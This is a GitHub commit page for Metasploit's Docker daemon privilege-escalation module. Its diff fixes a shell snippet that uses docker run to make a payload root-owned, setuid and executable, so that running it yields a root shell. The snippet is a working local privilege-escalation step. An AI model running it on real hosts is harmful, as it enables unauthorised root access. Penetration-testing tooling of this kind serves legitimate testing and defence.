Skip to content

Commit 7e9d0b3

Browse files
committed
Fix permissions in docker priv_esc module
The previous command didn't give the original user enough permissions to execute the payload. This was resulting in permission denied and preventing me from getting a root shell. Fixes rapid7#8937
1 parent c67e407 commit 7e9d0b3

File tree

1 file changed

+1
-1
lines changed

1 file changed

+1
-1
lines changed

modules/exploits/linux/local/docker_daemon_privilege_escalation.rb

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -64,7 +64,7 @@ def shell_script(exploit_path)
6464

6565
%Q{
6666
IMG=`(echo "FROM scratch"; echo "CMD a") | docker build -q - | awk "END { print \\\\$NF }"`
67-
EXPLOIT="chown 0:0 #{exploit_path}; chmod u+s #{exploit_path}"
67+
EXPLOIT="chown 0:0 #{exploit_path}; chmod u+s #{exploit_path}; chmod +x #{exploit_path}"
6868
docker run #{dep_options} $IMG /bin/sh -c "$EXPLOIT"
6969
docker rmi -f $IMG
7070
#{exploit_path}

0 commit comments

Comments
 (0)